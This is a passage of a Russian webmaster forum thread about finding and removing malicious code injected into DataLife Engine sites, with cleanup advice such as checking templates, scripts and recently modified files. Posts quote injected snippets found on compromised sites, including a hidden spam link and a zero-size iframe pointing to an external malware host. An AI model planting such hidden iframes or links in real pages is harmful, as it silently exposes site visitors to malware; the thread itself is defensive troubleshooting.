Вредоносный код в DLE

12
[Удален]
#11

Хотел создать подобную тему, но отпишу сюда... сайт на дле у меня.. смотрю проиндексированноссть страниц в яндексе, а там над каждой ссылкоц вот такое выдает Сайт может угрожать безопасности вашего компьютера.. скажите где вобще в дле искать коды эти вредные, чтобы исправить эту Сайт может угрожать безопасности вашего компьютера ?? )

sanya pro
На сайте с 28.02.2009
Offline
27
#12

Paguk_pro, юзайте virustotal - это онлайн сканер, вставьте урл и вперед...

Просмотрите все *.tpl

Еще вредоносный код может присутствовать в js файлах.

Ищите!

[Удален]
#13
sanya pro:
Paguk_pro, юзайте virustotal - это онлайн сканер, вставьте урл и вперед...

Просмотрите все *.tpl
Еще вредоносный код может присутствовать в js файлах.

Ищите!

с этим сканером ниче непонятно.. я нашел в шаблоне addcomments.tpl вот такую ссылку <a href="http://www.gnef.ru" style="display:none">2012</a> это и есть вредоносный код что ли ? долбанные хакеры блин

sanya pro
На сайте с 28.02.2009
Offline
27
#14

Нет! Это скрытая ссылка style="display:none"

вредоносный код на 1 посте топика

[Удален]
#15
sanya pro:
Нет! Это скрытая ссылка style="display:none"

вредоносный код на 1 посте топика

ну в *.tpl я везде проверил нет.. а так у меня кучу js файлов на серве.. это каждый вручную проверять что ли... жесть. может как то попроще можно..? как можно сделать групповой поиск по большому количеству файлов ? например скачать щас все файлы сайта,или же наверно ток js файлы открыть их, и ввести в поиск начало вредоносного кода..

ProLiant
На сайте с 07.12.2005
Offline
249
#16
WebMasterArtem:
Уже довольно долго не могу найти этот код. Гугл говорит, что на сайте присутствует такой код

Было у меня подобное. Искоренил просматривая по фтп каждый каталог двига на предмет последних по времени изменных файлов (по большому счету не так их и много там) - увидите, что есть файлы, измененные в один и тот же день, в одно и то же время, там и смотрите. Увидел такой - открывай, удаляй скрипт, сохраняй... Он обычно во многих файлах сидит (в т.ч. и в js), не всегда только в файлах шаблона ***.tpl

После этого рекомендую сменить пароли на фтп, ну и проверить свой комп на вирусы. У меня уже год как все тихо, больше не появляются.

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
Und
На сайте с 16.06.2008
Offline
128
Und
#17

Сегодня заметил что с моего сайта stateyki.net подгружается Блокиратор Виндоус. Знакомый посмотрев сайт обнаружил ифрейм <iframe width="0%" height="0%" style="border: 0px;" src="http://traffffff.ipq.co/"></iframe> , но что делать дальше и где искать гадость незнает.

Подскажите пожалуйста где искать (все основные файлы посмотрел , там чисто).

P.S. нашёл . всем спасибо.

ZennoPoster (http://www.zennolab.com/ru/products/zennoposter/pid/ea8c4a97-055c-44e1-b81f-556252ca032d) - автоматизируйте любые задачи в интернете.
2
На сайте с 21.06.2008
Offline
19
#18

Нашел код, что в первом посте не в файлах, а в коде баннера, что вставляется через рекламные материалы ДЛЕ.. Видать через админку пробрались, бо дыры все вроде залатал..

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий